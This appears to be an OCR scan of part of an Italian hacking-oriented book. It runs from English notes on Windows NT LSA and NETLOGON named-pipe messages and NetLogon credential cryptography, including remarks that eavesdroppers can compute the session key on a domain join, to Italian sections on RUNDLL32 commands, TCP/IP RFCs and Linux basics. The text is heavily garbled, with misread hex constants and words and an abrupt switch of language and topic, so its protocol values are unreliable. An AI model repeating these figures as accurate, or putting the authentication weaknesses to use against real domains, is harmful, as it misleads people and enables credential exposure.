# request 



RPC_ReqNorm RW 




{ 

UINT32 allochint 
UINT16 prescontext 
UINT16 opnum 


# the size of the stub data in bytes 

# presentation context identifier (0x0) 

# operation number (0x15) 
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* stub USE TvPacket 


§ a packet dependent on the pipe name 

§ (probably the interface) and the op number) 


# response to a request 


RPC_ResNorm RW 




{ 

UINT32 allochlnt 
UINT16 prescontext 
UINT8 cancelcount 
UINT8 reserved 


§ size of the stub data in bytes 

§ presentation context identifier (same as request) 
# cancel count? (0x0) 
Ì0- one byte padding 


* stub USE TvPacket 


# the remainder of the reply 


3.3) Tali 




The end of each of the NTLSA and NETLOGON named pipes ends with: 


end of 

UINT32 return 


data 
code 


RPC Bind / Bind Ack 





RPC Binds are the process of associating an RPC pipe (e.g \PIPE\lsarpc) 
with a "transfer syntax" (see RPC_Iface structure) . The purpose for doing 
this is unknown. 

Note: The RPC_ResBind SMB Transact request is sent with two uintl6 setup 
parameters . The first is 0x0026; the second is the file handle 
returned by the SMBopenX Transact response. 

Note: The RPC ResBind members maxtsize, maxrsize and assocgid are the 

same in the response as the same members in the RPCReqBind. The 
RPC_ResBind member trans fersyntax is the same in the response as 
the 



Note: The RPC ResBind response member secondaddr contains the name 

of what is presumed to be the service behind the RPC pipe. The 
mapping identified so far is: 



initial SMBopenX request : 


RPC_ResBind response: 


"\ \PIPE\ \srvsvc" 


"\ \PIPE\ \ntsvcs " 


"\\PIPE\\samr" 


"\\PIPE\\lsass " 


"\\PIPE\\lsarpc" 


"\\PIPE\\lsass " 


"\ \PIPE\ \wkssvc" 


"\ \PJP£\ \wksvcs " 


"\\PIPE\ \NETLOGON" 


"\ \PIPE\ \NETLOGON" 



Note: The RPC Packet fraglength member in both the Bind Request and Bind 
Acknowledgment must contain the length of the entire RPC data, 
including the RPC_Packet header. 



Request : 

RPC_Packet 
RPC__ReqBind 

Response : 

RPC_Packet 
RPC_ResBind 



NTLSA Transact Named Pipe 



The sequence of actions taken on this pipe are: 

- Establish a connection to the IPC$ share (SMBtconX) . use encrypted passwords . 
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Open an RPC Pipe with the name "\ \PIPE\ \lsarpc " . Store the file handle. 

Using the file handle, send a Set Named Pipe Handle state to 0x4300. 

Send an LSA Open Policy request . Store the Policy Handle. 

Using the Policy Handle, send LSA Query Info Policy requests, etc. 

Using the Policy Handle, send an LSA Close. 

Close the IPC$ share. 



Defines for this pipe, identifying the query are: 



- LSA Open Policy: 


0x2c 


— LSA Query Info Policy: 


0x07 


- LSA Enumerate Trusted Domains : 


OxOd 


- LSA Open Secret: 


Oxff 


- LSA Lookup SIDs: 


Oxfe 


— LSA Lookup Names: 


Oxfd 



LSA Open Policy 

Note: The policy handle can be anything you like. 
Request : 

VOID* buffer pointer 

UNISTR2 server name — unicode string starting with two ' \ ' s 
OBJ_ATTR object attributes 
UINT32 1 - desired access 



Response : 

POL_HND LSA policy handle 
return 0 - indicates success 



LSA Query Info Policy 

Note: The info class in response must be the same as that in the request. 
Request : 

POL_HND LSA policy handle 



Response : 



VOID* undocumented buffer pointer 

UINT16 info class (same as info class in request) . 

switch (info class) 
case 3: 
case 5: 
( 



return 0 - indicates success 

LSA Enumerate Trusted Domains 

Request : 

no extra data 
Response : 



UINT32 
UINT32 



0 - enumeration context 
0 - entries read 



return 0x8000 OOla - "no trusted domains" success code 
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LSA Open Secret 



Request : 

no extra data 



Response : 

UINT32 
UINT32 
UINT32 
UINT32 
UINT32 

return 



0 - undocumented 
0 - undocumented 
0 - undocumented 
0 - undocumented 
0 - undocumented 



OxOCOO 0034 



"no such secret " success code 



LSA Close 



Request : 

POL_HND policy handle to be closed 
Response : 

POL_HND Os - closed policy handle (ali zeros) 
return 0 - indicates success 

LSA Lookup SIDS 



Note: num entries in response must be same as num entries in request. 



Request : 



POL_HND 
UINT32 
VOID* 
VOID* 



LSA policy handle 
num_entries 

undocumented domain SID buffer pointer 
undocumented domain name buffer pointer 



VOID* [num entries] undocumented domain SID pointers to be looked up. 
DOM_SID [num_entries] domain SIDs to be looked up. 
char[16] completely undocumented 16 bytes . 



Response : 



DOM REF 



UINT32 
VOID* 



domain reference response 

num_entries (listed above) 
undocumented buffer pointer 



UINT32 num entries (listed above) 

D0MSID2 [num entries] domain SIDs (from Request, listed above) 



UINT32 



return 



num entries (listed above) 



0 - indicates success 



LSA Lookup Names 



Note: num entries in response must be same as num entries in request. 



Request : 



POL_HND 


LSA policy handle 




UINT32 


num_entries 




UINT32 


num_entries 




VOID* 


undocumented domain 


SID buffer pointer 


VOID* 


undocumented domain 


name buffer pointer 
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char[] 

Response : 

DOMREF 

UINT32 
VOID* 



undocumented bytes - falsely translated SID structure? 



domain reference response 



num_entr±es (listed above) 
undocumented buffer pointer 

num_entries (listed above) 



UINT32 

DOMRID [num_entries] domain SIDs (from Request, listed above) . 

UINT32 num_entries (listed above) 

return 0 - indicates success 



NETLOGON rpc Transact Named Pipe 



The sequence of actions taken on this pipe are: 

- Establish a connection to the IPC$ share (SMBtconX) . use encrypted passwords . 

- Open an RPC Pipe with the name "\\PIPE\\NETLOGON" . Store the file handle. 

- Using the file handle, send a Set Named Pipe Handle state to 0x4300. 

- Create Client Challenge. Send LSA Request Challenge. Store Server Challenge. 

- Calculate Session Key. Send an LSA Auth 2 Challenge. Store Auth2 Challenge. 

- Calc/Verify Client Creds . Send LSA Srv PW Set. Calc/Verify Server Creds . 

- Calc/Verify Client Creds. Send LSA SAM Logon . Calc/Verify Server Creds. 

- Calc/Verify Client Creds. Send LSA SAM Logoff. Calc/Verify Server Creds. 

- Close the IPC$ share. 



Defines for this pipe, identifying the query are: 



- LSA Request Challenge: 0x04 

- LSA Server Password Set: 0x06 

- LSA SAM Logon: 0x02 

- LSA SAM Logoff: 0x03 

- LSA Auth 2: 0x0 f 

- LSA Logon Control : OxOe 



LSA Request Challenge 



Note: logon server name starts with two '\ ' characters and is upper case. 



Note: logon client is the machine, not the user. 



Note: the initial LanManager password hash, against which the challenge 
is issued, is the machine name itself (lower case) . there will be 
calls issued (LSA Server Password Set) which will change this, later. 
refusing these calls allows you to always deal with the same password 
(i.e the LM§ of the machine name in lower case) . 



Request : 



VOID* undocumented buffer pointer 

UNISTR2 logon server unicode string 

UNISTR2 logon client unicode string 



Response : 

char[8] 
return 



server challenge 
0 - indicates success 



LSA Authenticate 2 



Note: in between request and response, calculate the client credentials, 
and check them against the client-calculated credentials (this 
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process uses the previously received client credentials) . 

Note: neg_flags in the response is the same as that in the request . 

Note: you must take a copy of the client-calculated credentials received 

here, because they will be used in subsequent authentication paokets. 



Request : 

LOG^INFO 

char[8] 
UINT8[] 
UINT32 

Response : 

char[8] 
UINT32 



client Identification info 
client-calculated credentials 

padding to 4-byte align with start of SMB header. 
neg_flags - negotiated flags (usuai value is 0x0000 Olff) 



server credentials . 

neg_flags - same as neg_flags in request . 



return 



indicates success. f allure value unknown. 



LSA Server Password Set 



Note: the new password is suspected to be a DES encryption using the old 
password to generate the key. 

Note: in between request and response, calculate the client credentials, 
and check them against the client-calculated credentials (this 
process uses the previously received client credentials) . 

Note: the server credentials are constructed from the client-calculated 
credentials and the client time + 1 second. 

Note: you must take a copy of the client-calculated credentials received 

here, because they will be used in subsequent authentication packets. 

Request : 

CLNT_INFO client identification/authentication info 



Response : 

CREDS server credentials . server time stamp appears to be ignored. 

return 0 - indicates success; OxCOOO 006a indicates failure 



LSA SAM Logon 



Note: valid_user is True iff the username and password hash are valid for 
the requested domain. 

Request : 

SAM_INFO sam_id structure 

Response : 

VOID* undocumented buffer pointer 

CREDS server credentials. server time stamp appears to be ignored. 

if (valid_user) 
{ 

UINT16 3 - switch value indicating USER_INFO structure. 

VOID* non-zero - pointer to USER_INFO structure 

USER_INFO user logon Information 

UINT32 1 - Authoritative response; 0 - Non-Auth? 
return 0 - indicates success 

} 

else 
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{ 

UINT16 0 - switch value. valile to indicate no user presunteci. 
VOID* 0x0000 0000 - indicates no USER_INFO structure. 



UINT32 1 - Authoritative response; 0 - Non-Auth? 




LSA SAM Logoff 



Note: presumably, the SAM_INFO structure is validated, and a (currently 
undocumented) error code returned if the Logoff is invalid. 

Request : 



Response : 

VOID* undocumented buffer pointer 

CREDS server credentials. server time stamp appears to be ignored. 

return 0 - indicates success. undocumented failure indication. 



\ \MAILSLOT\NET\NTLOGON 



Note: mailslots will contain a response mailslot, to which the response 

should be sent . the target NetBIOS name is REQUEST_NAME<2 0> , where 
KEQUEST_NAME is the name of the machine that sent the request . 



Query for PDC 



Note: NTversion, LMNTtoken, LM20token in response are the sante as those 
given in the request . 



Request : 



UINT1 6 


0x0007 - Query for PDC 




STR 


machine name 




STR 


response mailslot 




UINT8[] 


padding to 2-byte align with start of mailslot . 




UNISTR 


machine name 




UINT32 


NTversion 




UINT1 6 


LMNTtoken 




UINT1 6 


LM20token 




Response : 






UINT1 6 


OxOOOA - Respose to Query for PDC 




STR 


machine name (in uppercase) 




UINT8[] 


padding to 2-byte align with start of mailslot . 




UNISTR 


machine name 




UNISTR 


domain name 




UINT32 


NTversion (sante as received in request) 




UINT1 6 


LMNTtoken (sante as received in request) 




UINT1 6 


LM20token (same as received in request) 




SAM Logon 






Note: machine name in response is preceded by two '\ ' characters . 




Not e : NTversi on , 


LMNTtoken, LM20token in response are the same as 


those 


given in the request . 




Note: user name 


in the response is presumably the same as that in 


the request . 



Request : 
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UINTl 6 


0x0012 - SAM Logon 


UINT1 6 


request count 


UNISTR 


machine name 


UNISTR 


user name 


STR 


response mailslot 


UINT32 


alloweable account 


UINT32 


domain SID size 


char [sid__size] 


domain SID, of sid__size bytes . 


UINT8 [ ] 


???? padding to 4? 2? -byte align with start of mailslot. 


UINT32 


NTversion 


Response : 




UINTl 6 


0x0013 - Response to SAM Logon 


UNISTR 


machine name 


UNISTR 


user name — workstation trust account 


UNISTR 


domain name 


UINT32 


NTversion 


UINTl 6 


LMNTtoken 


UINTl 6 


LM20token 



SRVSVC Transact Named Pipe 



Defines for this pipe, identifying the query are: 

- Net Share Enum : OxOf 

- Net Server Get Info : 0x15 



Net Share Enum 



Note: share level and switch value in the response are presumably the 
same as those in the request . 

Note: cifsrap2.txt (section 5) may be of limited assistance here. 



Request : 



VOID* 

UNISTR2 




pointer (to server name?) 
server name 


UINT8[] 




padding to get unicode string 4— byte aligned 
with the start of the SMB header. 


UINT32 
UINT32 




share level 
switch value 


VOID* 

SHARE_INFO_ 


_1_CTR 


pointer to SHARE_INF0_1_CTR 
share info with 0 entries 


UINT32 






Response : 






UINT32 
UINT32 




share level 
switch value 


VOID* 

SHARE_INFO_ 


_1_CTR 


pointer to SHARE_INF0_1_CTR 

share info (only added if share info ptr is non-zero) 


return 




0 - indicates success 


Net Server Get 


Info 




Note: level is the 


same value as in the request . 



Request : 
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Response : 



UINT32 
VOID* 



switch level 

pointer to SERVER_INFO_101 



SERVER_INFO_101 server info (only added if server info ptr is non— zero) 



Appendix 



Al) Cryptographic side of NT Domain Authentication 



A Definitions 



Add(Al,A2) : Intel byte ordered addition of corresponding 4 byte words 
in arrays Al and A2 

E (K, D) : DES ECB encryption of 8 byte data D using 7 byte key K 
lmowf () : Lan man hash 
ntowf() : NT hash 

PW: md4 (machine_pas sword) == md4 (lsadump $machine . acc) == 
pwdump (machine$ ) (initially) == md4 (lmowf (unicode (machine) ) ) 

RC4 (K, Lk, D, Ld) : RC4 encryption of data D of length Ld with key K of 
length Lk 

v[m. .n(,l) ] : subset of v from bytes m to n, optionally padded with 
zeroes to length 1 

Cred(K,D) : E (K [7 . . 7, 7] , E (K [0 . . 6] , D) ) computes a credential 
Time() : 4 byte current time 

Cc,Cs: 8 byte client and server challenges Rc,Rs: 8 byte client and 
server credentials 



A Protocol 



C->S ReqChal,Cc S->C Cs 

C & S compute session key Ks = E (PW[9. . 15] ,E (PW[0 . .6] , Add (Ce, Cs) ) ) 

C: Re = Cred(Ks,Cc) C->S Authenticate, Re S: Rs = Cred(Ks, Cs) , 
assert(Rc == Cred(Ks, Ce) ) S->C Rs C: assert (Rs == CredfKs, Cs) ) 

On joining the domain the client will optionally attempt to change its 
password and the domain controller may refuse to update it depending 
on registry settings . This will also occur weekly afterwards . 

C: Te = Time(), Re' = Cred (Ks , Rc+Tc) C->S ServerPasswordSet, Re ' , Te, 
rc4 (Ks [0 . . 7, 16] , lmowf (randompassword ( ) ) C: Re = Cred (Ks, Rc+Tc+1) S: 
assert (Re' == Cred (Ks, Rc+Tc) ) , Ts = Time() S: Rs ' = Cred (Ks, Rs+Tc+1) 
S->C Rs',Ts C: assert (Rs ' == Cred (Ks, Rs+Tc+1) ) S: Rs = Rs ' 

User: U with password P wishes to login to the domain (incidental data 
such as workstation and domain omitted) 

C: Te = Time(), Re ' = Cred (Ks , Rc+Tc) C->S NetLogonSamLogon, Re ' , Te, U, 
rc4(Ks[0. .7,16] ,16,ntowf(P) ,16) , rc4(Ks[0. . 7, 16] , 16, lmowf (P) , 16) S: 
assert (Re ' == Cred (Ks, Rc+Tc) ) assert (passwords match those in SAM) S: 
Ts = Time () 



return 



0 - 



indicates success 
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S->C Cred (Ks, Cred (Ks, Rc+Tc+1) ), userinfo (logon script , UID , SIDs , etc) C: 
assert(Rs == Cred (Ks , Cred (Rc+Tc+1 ) ) C: Re = Cred (Ks, Rc+Tc+1) 



A Comments 



On first joining the domain the session key could be computed by 
anyone listening in on the network as the machine password has a well 
known valile. Until the machine is rebooted it will use this session 
key to encrypt NT and LM one way functions of passwords which are 
password equivalents . Any user who logs in before the machine has been 
rebooted a second time will have their password equivalent exposed. Of 
course the new machine password is exposed at this time anyway. 

None of the returned user info such as logon script, profile path and 
SIDs *appear* to be protected by anything other than the TCP checksum. 

The server time stamps appear to be ignored. 

The client sends a ReturnAuthenticator in the SamLogon request which I 
can 't find a use for. However its time is used as the timestamp 
returned by the server. 

The password OWFs should NOT be sent over the network reversibly 
encrypted. They should be sent using RC4 (Ks,md4 (owf) ) with the server 
computing the same function using the owf values in the SAM. 



A SIDs and RIDs 



SIDs and RIDs are well documented elsewhere. 

A SID is an NT Security ID (see DOM_SID structure) . They are of the form: 



S-revision-NN-SubAuthl-SubAuth2-SubAuth3 . . . 

S— revision— 0xNNNNNNNNNNNN—SubAuthl—SubAuth2—SubAuth3 . . . 



currently, the SID revision is 1 . 

The Sub—Authorities are known as Relative IDs (RIDs) . 



A Well-known SIDs 



A Universal well-known SIDs 



Nuli SID 

World 

Locai 

Creator Owner ID 
Creator Group ID 
Creator Owner Server ID 
Creator Group Server ID 



S-1-0-0 
S-l-1-0 
S-l-2-0 
S-l-3-0 
S-l-3-1 
S-l-3-2 
S-l-3-3 



(Non-unique IDs) 



S-l-4 



A NT well-known SIDs 



NT Authority 
Dialup 



S-l-5 
S-l-5-1 



Network 
Batch 

Interactive 
Service 

AnonymousLogon 
Proxy 

ServerLogon 



S-l-5-2 
S-l-5-3 
S-l-5-4 
S-l-5- 6 
S-l-5-7 
S-l-5-8 
S-l-5-8 



(aka nuli logon session) 



(aka domain controller account) 



(Logon IDs) 



S-1-5-5-X-Y 
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(NT non-unique IDs) S-l-5-0xl5-. . . 
(Built-in domain) s-l-5-0x20 



A Well-known RIDS 



A RID is a sub-authority value, as part of either a SID, or in the case 
of Group RIDs, part of the DOM_GID structure, in the USER_INF0_1 
structure, in the LSA SAM Logon response. 

A fieli— known RID users 



DOMAIN_ USER_RID_ADMIN 
DOMAIN^ USER_RID_ GUES T 



0x0000 01F4 
0x0000 01F5 



A fieli— known RID groups 



DOMAIN_GROUP_RID_ADMINS 0x0000 0200 

DOMAIN-GROUP_RID__USERS 0x0000 0201 



DOMAIN- GROUP-RID_ GUES TS 



0x0000 0202 



A tiell-known RID aliases 



DOMAIN_ALIAS_RID__ADMINS 
DOMAIN-ALIAS-_RID- USERS 
DOMAIN— ALIAS_RID_GUESTS 
DOMAIN_ALIAS_RID-POWER- USERS 

DOMAIN_ALI AS_RID_ACCOUNT-OPS 
DOMAIN_ALIAS_RID_SYSTEM_OPS 
DOMAIN_ALIAS_RID_PRINT_OPS 
DOMAIN_ALIAS_RID_BACKUP_OPS 

DOMAIN__ALIAS_RID_REPLICATOR 



0x0000 0220 
0x0000 0221 
0x0000 0222 
0x0000 0223 

0x0000 0224 
0x0000 0225 
0x0000 0226 
0x0000 0221 

0x0000 0228 



RunDII32 



Molte volte guardando all'interno del dei programmi lanciati automaticamente da Windows 
allo startup vi sarete trovati davanti a strane linee di comando eseguite con RUNDLL32. 
Il file Rundll32.exe, è uno dei file di sistema a cui viene demandata l'esecuzione di molte delle 
funzioni del sistema operativo. 

Quello che segue è un elenco delle funzioni principali svolte mediante RUNDLL32. 

Chiusura di Windows. 
user,exitwindows 

Apertura della finestra di dialogo di connessione alla rete. 
user,wnetconnectdialog 

Aperture della finestra di dialogo di disconnessione dalla rete. 
user,wnetdisconnectdialog 

Blocco del sistema. 
user,disableoemlayer 

Aggiornamento dello schermo ( F5 ). 
user,repaintscreen 
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Posizionamento del cursore del mouse nell'angolo superiore sinistro dello 
schermo. 

user,setcursorpos 

Apertura della finestra di dialogo Copia Disco. 
diskcopy,DiskCopyRunDII 

Apertura della finestra di dialogo Accesso Remoto. 
rnaui.dll, RnaWizard/ 1 

Apertura della finestra di Gestione Risorse. 
shell,shellexecute 

Apertura della finestra di dialogo Apri Con ... 
shell32,OpenAs_ RunDLL 

Apertura della finestra di dialogo Formattazione. 
shell32,SHFormatDrive 

Apertura della finestra di dialogo di informazioni sulla memoria e sulle 
risorse. 

shell32,ShellAboutA 

Riavvio di Windows 98 
shell32,SHExitWindowsEx 0 

Chiusura di Windows 98 
shell32,SHExitWindowsEx 1 

Avvio del Pc in Windows 98 
shell32,SHExitWindowsEx 2 

Riavvio di Esplora Risorse in Windows 98 
shell32,SHExitWindowsEx -1 

Avvio del Panello di Controllo. 
shell32, Control RunDLL 

Avvio del modulo Schermo del Panello di Controllo 
shell32, Control RunDLL, desk. cpl 

Avvio del modulo <X> del Pannello di Controllo da Main.CPL. 

<X> = 0 Mouse, 1 Tastiera, 2 Stampanti, 3 Tipi di carattere, 4 Controllo 

energetico 

shell32, Control RunDLL,main.cpl@<X> 

RFC relative a TCP/I P 

Gli standard per TCP/IP sono pubblicati in una serie di documenti denominati Requests for 
Comments (RFC). Le RFC sono una serie di rapporti soggetti a continue modifiche, proposte 
per protocolli e standard di protocolli che descrivono il funzionamento interno di TCP/IP e 
Internet. 

Sebbene gli standard TCP/IP siano sempre pubblicati sotto forma di RFC, non tutte le RFC li 
specificano. Le RFC sono create da persone che a titolo gratuito scrivono e sottopongono 
una proposta in bozza per un nuovo protocollo o specifica all'lnternet Engineering Task Force 
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(IETF) e ad altri gruppi di lavoro. Le bozze inviate vengono prima esaminate da un perito 
tecnico, un gruppo di esperti, o un curatore delle RFC, quindi viene loro assegnato uno stato. 
Se una bozza supera questo stadio iniziale di revisione, verrà diffusa nei più ampi ambienti 
Internet per un periodo di ulteriore osservazione e revisione e le verrà assegnato un numero 
RFC. Questo numero RFC è invariabile. 

Se vengono apportate delle modifiche alla proposta specifica, le bozze che vengono 
modificate o aggiornate verranno diffuse utilizzando un nuovo RFC (un numero superiore a 
quello originale) per identificare i documenti più recenti. 

Alle RFC possono essere assegnati cinque diversi stati nel corso dell'elaborazione degli 
standard, come riportato nella tabella che segue. 

Stato Descrizione 

Protocollo standard Un protocollo standard ufficiale di Internet. 

Protocollo standard Sottoposto ad esame e revisione in corso per divenire un protocollo 

in bozza standard. 

Protocollo standard Un p rotoco || 0 cne j n futuro potrebbe diventare un protocollo standard, 
proposto r* r* 

Protocollo Un protocollo progettato a scopo sperimentale. Un protocollo 

sperimentale sperimentale non è progettato per l'utilizzo operativo. 

Protocollo Un protocollo sviluppato da un'altra organizzazione degli standard che 

informativo viene incluso per praticità degli ambienti Internet. 

Protocollo storico Protocolli che sono stati soppiantati o che sono diventati obsoleti per 
l'avvento di nuovi protocolli. 

RFC per TCP/IP per Windows 2000 

La tabella che segue mostra le RFC supportate dal protocollo TCP/IP in Windows 2000. 

Numero di riferimento _.. . 

RFC Tlt0l ° 

768 User Datagram Protocol (UDP) 

783 Trivial File Transfer Protocol (TFTP) 

791 Internet Protocol (IP) 

792 Internet Control Message Protocol (ICMP) 

793 Transmission Control Protocol (TCP) 
816 Fault Isolation and Recovery 

826 Address Resolution Protocol (ARP) 

854 Telnet Protocol (TELNET) 

862 Echo Protocol (ECHO) 

863 Discard Protocol (DISCARD) 

864 Character Generator Protocol (CHARGEN) 

865 Quote of the Day Protocol (QUOTE) 
867 Daytime Protocol (DAYTIME) 

894 IP over Ethernet 

919 Broadcasting Internet Datagrams 

922 Broadcasting Internet Datagrams in the Presence of Subnets 

950 Internet Standard Subnetting Procedure 

959 File Transfer Protocol (FTP) 

1 0Q1 Protocol Standard for a NetBIOS Service on a TCP/UDP Transport: 

Concepts and Methods 
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1 0Q2 Protocol Standard for a NetBIOS Service on a TCP/UDP Transport: 

Detailed Specifications 

1 009 Requirements for Internet Gateways 

1034 Domain Names ? Concepts and Facilities 

1035 Domain Names ? Implementation and Specification 
1042 IP over Token Ring 

1112 Internet Group Management Protocol (IGMP) 

1 122 Requirements for Internet Hosts ? Communication Layers 

1 1 23 Requirements for Internet Hosts ? Application and Support 
1 157 Simple Network Management Protocol (SNMP) 

1179 Line Printer Daemon Protocol 

1188 IPoverFDDI 

1191 Path MTU Discovery 

1201 IPsuARCNET 

1 256 ICMP Router Discovery Messages 

1323 TCP Extensions for High Performance 

1518 An Architecture for IP Address Allocation with CIDR 

^g^g Classless Inter-Domain Routing (CIDR). An Address Assignment 

and Aggregation Strategy 

1 81 2 Requirements for IP Version 4 Routers 

1 878 Variable Length Subnet Table For IPv4 

201 8 TCP Selective Acknowledgment Options 

21 31 Dynamic Host Configuration Protocol (DHCP) 

21 36 Dynamic Updates in the Domain Name System (DNS UPDATE) 

2236 Internet Group Management Protocol, Version 2 

Consultazione delle RFC 

È possibile trovare le RFC nel sito web Request for Comments (informazioni in inglese). 
Questo sito Web è attualmente gestito da membri dell'lnformation Sciences Institute (ISI) che 
pubblicano un elenco di tutte le RFC opportunamente classificate. Le RFC sono ordinate in 
uno dei seguenti modi: standard Internet approvati, standard Internet proposti (diffusi in 
formato bozza per la revisione), operazioni consigliate per Internet o documenti FYI (For Your 
Information). 



Note 



È possibile che gli indirizzi dei siti Web subiscano delle modifiche, pertanto il 
collegamento ai siti Web qui riportati potrebbe non essere possibile. 



Linux 

Come con tanti altri argomenti di questo volume anche Linux rientra tra quelli d'obbligo visto 
che l'aspirante hacker potrebbe averci a che fare sia come utente sul proprio sistema che 
come ospite indesiderato di quello di destinazione. 

Linux proviene da Minix e quindi come filosofia di base si attiene a quella dei sistemi Unix 
classici derivati dal System V. 

Esistono diverse distribuzioni in quanto Linux si attiene alla filosofia delf Open Source. 
Spesso questa viene confusa erroneamente con il concetto di gratuito. 
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L'open source prevede che un determinato software venga distribuito con i sorgenti ma 
questo non significa che il software debba essere fornito con tanto di setup e Utilities di 
settaggio. 

Le versioni distribuite da IBM su mainframe di Linux costano diverse centinaia di milioni. 
Detto in parole povere questa filosofia sarebbe come dire : 

"vuoi i sorgenti dei programmi ? eccoteli. Vuoi i programmi già compilati con un sistema di 
installazione e delle Utilities per il settaggio ? pagali." 

Le varie distribuzioni Linux si attengono a queste filosofie. 

Se uno volesse potrebbe scaricarsi i sorgenti di Linux, compilarli e poi installarli. 

Il fatto di voler avere dei CD da inserire dentro al supporto di lettura e pretendere di lanciare 

un setup di installazione significa dover pagare da un minimo di poche decine di dollari per la 

versione di base fino a qualche migliaio di dollari per le versioni servers. 

La versione distribuita coin 16 CD da RedHat relativa alla versione server avanzato coste 

circa 2900$. 

In ogni caso trovare un distribuzione anche gratuita è semplicissimo in quanto diverse riviste 

10 mettono in circolazione ogni mese. 

Linux sta sempre maggiormente diventando un sistema operativo concorrenziale a Windows 
per tanti motivi. 

11 primo è sicuramente legato all'affidabilità per quello che riguarda la gestione di servers di 
rete. 

Chiaramente il fatto di non dover pagare royalties diventa importante in tutte quelle aziende 
che altrimenti dovrebbero supportarsi su molte installazioni Windows il quale non viene 
distribuito gratuitamente, anzi, in molti casi a costi veramente esagerati come nel caso delle 
versione Win 2000 Advanced Server. 

Come abbiamo già detto precedentemente alcune argomentazioni in questo volume non 
vogliono essere dei trattati ma semplicemente fornire la basi minime di utilizzo. 
Anche per quello che riguarda lo Unix vedremo di capire soltanto i principi su cui si basa il 
sistema operativo nonché alcuni concetti legati a come Unix memorizza le informazioni legate 
all'uso dello stesso. 

Abbiamo detto che il cuore di questo sistema operativo è quello che abbiamo definito con il 
termine di Kernel il cui scopo è quello di intercettare e gestire tutto l'hardware, il sistema della 
security e il meccanismo di rete. 

Prima di fare un rapida panoramica sul sistema operativo voglio solo indicare il titolo di un 
volume reperibile sulla rete nel quale è spiegato in modo preciso e conciso tutto quello che 
riguarda il setup del sistema Linux e la sua sicurezza. 

Il volume si intitola "Get Acquainted with Linux Security and Optimization System". 

In fase di installazione è possibile richiedere che vengano installati i moduli sorgente per lo 

sviluppo a livello di kernel. 

I sorgenti sono generalmente posizionati nella directory : 
/usr/src 

Questi vengono forniti in quanto ogni volta che il cuore del sistema operativo viene 
riconfigurato è necessario ricompilare il tutto. 

In fase d'installazione è possibile richiedere che il sistema venga posizionato su diverse 
partizioni che compongono il filesystem le quali generalmente sono (con le loro dimensioni 
minime) : 



/ 


35 MB 


/boot 


5 MB 


/swap 


150 MB 


/usr 


232 MB 


/var 


25 MB 


/home 




/tmp 
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Le dimensioni e il numero delle partizioni viene richiesto in fase d'installazione e può essere 
eseguito tramite un utility di partizionamento come ad esempio Disk Druid o Fdisk. 
Quelle che seguono sono le principali directory e files usati da Unix. 



/apps 


In molti tipi di Unix questa directory contiene le 
applicazioni utente 


/etc 


La directory contiene I files di sistema I quali sono 
esclusivamente modificabili dal superusers. Tra i files che 
troviamo in questa directory ci sono : 


/etc/ export s 


Lista di tutti I files che devono essere esportati (NFS) . 


/etc/group 


Definizione dei gruppi del sistema 


/etc/hosts 


I nomi degli hots usati e relativi IP 


/etc/hosts . deny 


Lista degli host che non hanno le permission per accedere al 
sistema . 


/e tc/hosts. e quiv 




/etc/inetd. conf 


Questo è il file di configurazione di quelli definiti come 
Internet " super server " 


/ etc/motd 


T 7 ^ tsacrcii o W^s 7 cri n 7~tie~i 


/etc/passwd 


Il file passwords. 


/et c/prot ocol s 


Lista di tutti I protocolli Internet 


/etc/sendmail . cf 


Il sendmail daemon 's configuration file 


/etc/ services 


Lista di tutti i servizi forniti agli hosts 










/et c/securi ty/ passwd . 
adjunct 


Stessa cosa del file di prima ma su SunOS. 


/et c/ sysl og . conf 


Controlla dove I messaggi vengono loggati 


/etc/syslog . pid 


Il process ID del syslog . 


/etc/ttys 


I terminali attivi 


/etc/ttysrch 


La terminal table per la definizione di terminali sicuri 


/dev 


Tutti I device sono contenuti qui 










/tmp 


Directory temporanea 


/usr 


LA directory dove sono generalemnte contenute le home 
directory degli utenti 


/ usr/bin 


I files eseguibili degli utenti 


/usr/lib 


Directory delle librerie di alcuni linguaggi 


/var 


Contiene in genere alcune directory importanti per gli utenti 
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/adm 


Riservata per alcuni files di amministrazione 


/var/adm/lastlog 


La data dell' ultimo login degli utenti 


/ var/adm/messages 


Utilizzata per al memorizzazione di alcuni messaggi di sistema 


/ var/adm/pacct 


Process accounting file, utilizzato da ps. 










/ var/adm/utmp 


Gli utenti che sono loggati dentro al sistema sono scritti 
dentro a questo file. Questo viene utilizzato dal comando who. 


/ var/adm/ wtmpx 


Utilizzato dall'ultimo comando. Contiene I system' s login e le 
logout entries per ogni utente. 



Linux gestisce le comunicazioni di rete tramite dei device di rete che sono posizionati dentro 
alla directory /etc/sysconfig/network-scripts. 

I vari files di configurazione di ciascuna interfaccia sono : 

ifcfg-ethN 

dove N è il numero dell'interfaccia. 

Ad esempio la prima interfaccia è in ifcfg-ethO mentre la seconda in ifcfg-ethl e così via. 

II comando ifconfig ci mostra lo stato delle interfacce attive. 

Il boot loader di linux è costituito dal file presente nella directory lete chiamato lilo.conf. 

Il sistema operativo Unix dispone di un meccanismo particolare adatto a gestire la sicurezza 

dei files dentro allo stesso. 

L'uso di Unix è vincolato da una procedura di login mediante la quale un determinato utente 
viene identificato e grazie questa identificazione gli vengono assegnati dei privilegi particolari 
per ogni singolo file presente nel sistema. 

Ogni files possiede una serie di tre gruppi di attributi i quali specificano le permissions in 
relazione al proprietario del file, del gruppo di appartenenza e di quello definito come 
superutente. 

Quando viene richiesta una directory dentro a Unix ilo sistema visualizza ogni file nella forma: 

-rw-rw-rwx 3 Flavio Root 1024 Apr 18 12:10 file.txt 



ad esempio il comando Is potrebbe dare come risultato, se usato con l'argomento -I 



bash$ 


ls -1 
















total 


783 
















-rwx — 


1 


wood 


users 


1 


Jan 


25 


18 


28 19067haa 


-rw-r- 


— r — 1 


berry 


mail 


1 


Jan 


16 


12 


38 filter .14428 


-rw 


2 


rheyl 9 


root 


395447 


Jan 


24 


02 


59 pop3al3598 


-rw 


! 


rheyl 9 


root 


395447 


Jan 


24 


03 


00 pop3a!3600 



La posizione più a sinistra specifica il tipo di file come ad esempio potrebbe essere d in caso 
in cui il file sia una directory. 

Gli altri tre gruppi di tre caratteri sono le permissions del superuser, del gruppo e del 
proprietario del file il quale è che nell'esempio è rappresentato dal mio nome. 
Quello a fianco è il gruppo di appartenenza di Flavio. 

I flags di ciascun gruppo potrebbero essere r per read, w per write e x per execute. 



/ / / / > Other = tutti su questa macchina accedono 

I I I > Group = alcuni gruppi possono accedere 

I I > User = solo il proprietario 

I > Directory Mark 
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rw- r — r — 






/ 


/ / / 


> 


Gli altri possono solo leggere 


/ 


/ / 


> 


Il gruppo può solo leggere 


/ 


/ 


> 


